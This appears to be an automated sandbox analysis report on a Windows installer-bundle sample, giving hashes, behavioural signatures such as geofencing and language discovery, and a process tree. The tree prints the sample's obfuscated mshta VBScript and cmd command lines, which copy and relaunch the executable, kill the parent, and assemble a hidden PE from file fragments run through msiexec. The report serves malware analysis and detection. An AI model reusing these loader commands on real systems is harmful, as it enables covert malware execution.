Overview
overview
10Static
static
10setup_inst...32.exe
windows7-x64
10setup_inst...32.exe
windows10-2004-x64
10setup_inst...2b.exe
windows7-x64
7setup_inst...2b.exe
windows10-2004-x64
7setup_inst...61.exe
windows7-x64
1setup_inst...61.exe
windows10-2004-x64
1setup_inst...f8.exe
windows7-x64
10setup_inst...f8.exe
windows10-2004-x64
10setup_inst...34.exe
windows7-x64
6setup_inst...34.exe
windows10-2004-x64
6setup_inst...c2.exe
windows7-x64
3setup_inst...c2.exe
windows10-2004-x64
7setup_inst...cb.exe
windows7-x64
10setup_inst...cb.exe
windows10-2004-x64
10setup_inst...90.exe
windows7-x64
6setup_inst...90.exe
windows10-2004-x64
6setup_inst...79.exe
windows7-x64
10setup_inst...79.exe
windows10-2004-x64
10setup_inst...d8.exe
windows7-x64
10setup_inst...d8.exe
windows10-2004-x64
10setup_inst...3b.exe
windows7-x64
7setup_inst...3b.exe
windows10-2004-x64
7setup_inst...ac.exe
windows7-x64
6setup_inst...ac.exe
windows10-2004-x64
6setup_inst...38.exe
windows7-x64
10setup_inst...38.exe
windows10-2004-x64
10setup_inst...b5.exe
windows7-x64
3setup_inst...b5.exe
windows10-2004-x64
3setup_inst...b2.exe
windows7-x64
6setup_inst...b2.exe
windows10-2004-x64
7setup_inst...rl.dll
windows7-x64
3setup_inst...rl.dll
windows10-2004-x64
3Analysis
-
max time kernel
92s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-11-2024 09:28
Behavioral task
behavioral1
Sample
setup_installer/Wed0901eb1dae126e32.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
setup_installer/Wed0901eb1dae126e32.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
setup_installer/Wed094c47c32b.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
setup_installer/Wed094c47c32b.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
setup_installer/Wed096a1bff61.exe
Resource
win7-20241023-en
Behavioral task
behavioral6
Sample
setup_installer/Wed096a1bff61.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
setup_installer/Wed0971f17486f8.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
setup_installer/Wed0971f17486f8.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
setup_installer/Wed09977fdc12334.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
setup_installer/Wed09977fdc12334.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
setup_installer/Wed09abf83d9c2.exe
Resource
win7-20241010-en
Behavioral task
behavioral12
Sample
setup_installer/Wed09abf83d9c2.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
setup_installer/Wed09b2a8bc4f16cb.exe
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
setup_installer/Wed09b2a8bc4f16cb.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
setup_installer/Wed09b3a5ca1a712d390.exe
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
setup_installer/Wed09b3a5ca1a712d390.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
setup_installer/Wed09c42cad92c20f79.exe
Resource
win7-20241010-en
Behavioral task
behavioral18
Sample
setup_installer/Wed09c42cad92c20f79.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
setup_installer/Wed09cfb2f9758281d8.exe
Resource
win7-20240729-en
Behavioral task
behavioral20
Sample
setup_installer/Wed09cfb2f9758281d8.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
setup_installer/Wed09d27135e5a8b3b.exe
Resource
win7-20240708-en
Behavioral task
behavioral22
Sample
setup_installer/Wed09d27135e5a8b3b.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
setup_installer/Wed09d8d6edfaff2ac.exe
Resource
win7-20240903-en
Behavioral task
behavioral24
Sample
setup_installer/Wed09d8d6edfaff2ac.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
setup_installer/Wed09db0d52c38.exe
Resource
win7-20240903-en
Behavioral task
behavioral26
Sample
setup_installer/Wed09db0d52c38.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
setup_installer/Wed09e95ff6b5.exe
Resource
win7-20240708-en
Behavioral task
behavioral28
Sample
setup_installer/Wed09e95ff6b5.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
setup_installer/Wed09f257bb7877d00b2.exe
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
setup_installer/Wed09f257bb7877d00b2.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
setup_installer/libcurl.dll
Resource
win7-20240903-en
Behavioral task
behavioral32
Sample
setup_installer/libcurl.dll
Resource
win10v2004-20241007-en
General
-
Target
setup_installer/Wed094c47c32b.exe
-
Size
1.3MB
-
MD5
b5cfd3a9dc9e645e24c79991bca60460
-
SHA1
0d6bcdca2121d279bbe87c66cab515ac2478f555
-
SHA256
852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768
-
SHA512
55861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6
-
SSDEEP
24576:4ny/f9u3poiauUTvKptPMfEd4tic/3wFzUm72uuQ2HrvcFM71J7d2SMpBcBuAKlm:BFpxuUTSMNtPgJUmiQ2H9jkSpceGU
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exeXYB0bVL96aEKhA.exEmshta.exemshta.exeWed094c47c32b.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation XYB0bVL96aEKhA.exE Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation Wed094c47c32b.exe -
Executes dropped EXE 1 IoCs
Processes:
XYB0bVL96aEKhA.exEpid process 3288 XYB0bVL96aEKhA.exE -
Loads dropped DLL 2 IoCs
Processes:
msiexec.exepid process 5112 msiexec.exe 5112 msiexec.exe -
Blocklisted process makes network request 3 IoCs
Processes:
msiexec.exeflow pid process 32 5112 msiexec.exe 36 5112 msiexec.exe 38 5112 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.execmd.exeWed094c47c32b.exeXYB0bVL96aEKhA.exEtaskkill.exemshta.exemshta.exemshta.execmd.execmd.execmd.exemsiexec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wed094c47c32b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XYB0bVL96aEKhA.exE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4460 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
taskkill.exedescription pid process Token: SeDebugPrivilege 4460 taskkill.exe -
Suspicious use of WriteProcessMemory 33 IoCs
Processes:
Wed094c47c32b.exemshta.execmd.exeXYB0bVL96aEKhA.exEmshta.exemshta.execmd.exedescription pid process target process PID 2304 wrote to memory of 4228 2304 Wed094c47c32b.exe mshta.exe PID 2304 wrote to memory of 4228 2304 Wed094c47c32b.exe mshta.exe PID 2304 wrote to memory of 4228 2304 Wed094c47c32b.exe mshta.exe PID 4228 wrote to memory of 948 4228 mshta.exe cmd.exe PID 4228 wrote to memory of 948 4228 mshta.exe cmd.exe PID 4228 wrote to memory of 948 4228 mshta.exe cmd.exe PID 948 wrote to memory of 3288 948 cmd.exe XYB0bVL96aEKhA.exE PID 948 wrote to memory of 3288 948 cmd.exe XYB0bVL96aEKhA.exE PID 948 wrote to memory of 3288 948 cmd.exe XYB0bVL96aEKhA.exE PID 948 wrote to memory of 4460 948 cmd.exe taskkill.exe PID 948 wrote to memory of 4460 948 cmd.exe taskkill.exe PID 948 wrote to memory of 4460 948 cmd.exe taskkill.exe PID 3288 wrote to memory of 2728 3288 XYB0bVL96aEKhA.exE mshta.exe PID 3288 wrote to memory of 2728 3288 XYB0bVL96aEKhA.exE mshta.exe PID 3288 wrote to memory of 2728 3288 XYB0bVL96aEKhA.exE mshta.exe PID 2728 wrote to memory of 3588 2728 mshta.exe cmd.exe PID 2728 wrote to memory of 3588 2728 mshta.exe cmd.exe PID 2728 wrote to memory of 3588 2728 mshta.exe cmd.exe PID 3288 wrote to memory of 5036 3288 XYB0bVL96aEKhA.exE mshta.exe PID 3288 wrote to memory of 5036 3288 XYB0bVL96aEKhA.exE mshta.exe PID 3288 wrote to memory of 5036 3288 XYB0bVL96aEKhA.exE mshta.exe PID 5036 wrote to memory of 464 5036 mshta.exe cmd.exe PID 5036 wrote to memory of 464 5036 mshta.exe cmd.exe PID 5036 wrote to memory of 464 5036 mshta.exe cmd.exe PID 464 wrote to memory of 4832 464 cmd.exe cmd.exe PID 464 wrote to memory of 4832 464 cmd.exe cmd.exe PID 464 wrote to memory of 4832 464 cmd.exe cmd.exe PID 464 wrote to memory of 2176 464 cmd.exe cmd.exe PID 464 wrote to memory of 2176 464 cmd.exe cmd.exe PID 464 wrote to memory of 2176 464 cmd.exe cmd.exe PID 464 wrote to memory of 5112 464 cmd.exe msiexec.exe PID 464 wrote to memory of 5112 464 cmd.exe msiexec.exe PID 464 wrote to memory of 5112 464 cmd.exe msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """"=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe") do taskkill -f -im "%~nxL"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exEXYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF ""=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF "=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE") do taskkill -f -im "%~nxL"6⤵
- System Location Discovery: System Language Discovery
PID:3588
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCriPt:closE ( CrEaTeoBJecT ("WsCRiPT.ShEll" ). RuN( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ))5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou &STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "7⤵
- System Location Discovery: System Language Discovery
PID:4832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"7⤵
- System Location Discovery: System Language Discovery
PID:2176
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\PEQQN6S.OU7⤵
- Loads dropped DLL
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:5112
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im "Wed094c47c32b.exe"4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD5b259839b9455f04e8299f22cebe3274f
SHA130bbbc8d5089648c8c5425c23874976ba2e07b34
SHA256edf7907b29f08e5788b6c611660348cce7cfaacb16bc484471aa06a1b9f8af89
SHA5123de7e0e2d59a9bda837ca9bc5f0da15106ed045aaf28b0ad9ff6afb2a901f23747ace1373d9538692847f51cfbb22fa608e526cacce737c7e70b7482a643bb0d
-
Filesize
2B
MD5ac6ad5d9b99757c3a878f2d275ace198
SHA1439baa1b33514fb81632aaf44d16a9378c5664fc
SHA2569b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b
-
Filesize
1.6MB
MD5a2feb31d070b6920981b5461baa1ef81
SHA18b67bdb5e4a9e773c0ffade6545a3f292b2e7fd7
SHA256ac7f2aaad9b9548136d48eb1e769d4339e958fb56fda2151f8637add5a77c950
SHA512b82a3d898d1f328353c1911eff024f5b523f1d4fdf4dbdc914b2775d16590cce9c027e34b9c3f9681e9e09436dc345b4cff878b953c8525891736aeea1e14694
-
Filesize
1.3MB
MD5b5cfd3a9dc9e645e24c79991bca60460
SHA10d6bcdca2121d279bbe87c66cab515ac2478f555
SHA256852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768
SHA51255861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6
-
Filesize
210KB
MD5cd4352def1a81b4fe232eeb2c77dbc57
SHA19fb4f9a790efe3676915699bdc89ba0a06ce8210
SHA25693589b9795d7547015734043f51c8d9a561857452eb91a52609a0be35bc3701c
SHA5121b59d106cc324ad4c6f99358f6d9a6ec9c671ec8573c1f3084bf3d7f3c8f410691c9324b986d51cd89d5b0c48be95298a13a012ecbcfa379af906db25066656e